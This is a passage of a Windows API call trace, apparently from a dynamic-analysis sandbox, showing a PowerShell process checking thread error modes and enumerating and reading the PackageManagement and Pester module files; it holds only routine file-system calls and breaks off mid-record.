[0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.433] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0140.439] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0140.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8db50) returned 1 [0140.439] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6fc [0140.439] GetFileType (hFile=0x6fc) returned 0x1 [0140.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dac0) returned 1 [0140.439] GetFileType (hFile=0x6fc) returned 0x1 [0140.439] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392b29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392b29d8*, lpNumberOfBytesRead=0xb156f8dc28*=0x5f8, lpOverlapped=0x0) returned 1 [0140.441] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392b1f10, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392b1f10*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.441] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392b29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392b29d8*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.442] CloseHandle (hObject=0x6fc) returned 1 [0140.465] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0140.466] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0140.466] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0140.466] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0140.466] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0140.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0140.466] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.467] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.467] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0140.467] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.467] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0140.468] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.468] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.469] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0140.469] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0140.469] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0140.470] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.470] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.470] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0140.470] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0140.471] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0140.471] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.471] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0140.471] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0140.471] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0140.472] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0140.473] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0140.473] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.473] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0140.474] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.474] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.475] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0140.475] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0140.475] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0140.475] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, 